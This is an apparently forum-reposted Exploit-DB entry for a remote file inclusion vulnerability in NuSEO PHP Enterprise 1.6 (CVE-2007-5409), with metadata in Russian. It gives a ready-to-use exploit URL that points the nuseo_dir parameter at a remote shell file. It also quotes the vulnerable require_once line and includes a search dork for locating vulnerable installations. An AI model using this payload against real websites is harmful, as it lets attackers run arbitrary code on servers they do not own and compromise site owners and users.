Exploit nuseo PHP enterprise 1.6 - Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
4512
Проверка EDB
  1. Пройдено
Автор
BINGZA
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-5409
Дата публикации
2007-10-10
Код:
Vulnerability Type: Remote File Inclusion
Vulnerable file: /NuSEO PHP Enterprise.v1.6 Nulled by DGT/NuSEO.PHP.Enterprise.v1.6.PHP.NULL-DGT/nuseo/admin/nuseo_admin_d.php
Exploit URL: http://localhost/path/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: nuseo_dir
Line number: 268
Lines:

----------------------------------------------

require_once( $nuseo_dir . '/nuseo' . '_d.php' );
//nuseo_require_once( $nuseo_config['dir'] . '/admin/nuseo_admin_config_file' );

----------------------------------------------

GrEeTs To sHaDoW sEcUrItY TeAm & str0ke

FoUnD By BiNgZa

DoRk'SEO by NuSEO.PHP'

[email protected]

shadow.php0h.com

# milw0rm.com [2007-10-10]
 
Источник
www.exploit-db.com

Похожие темы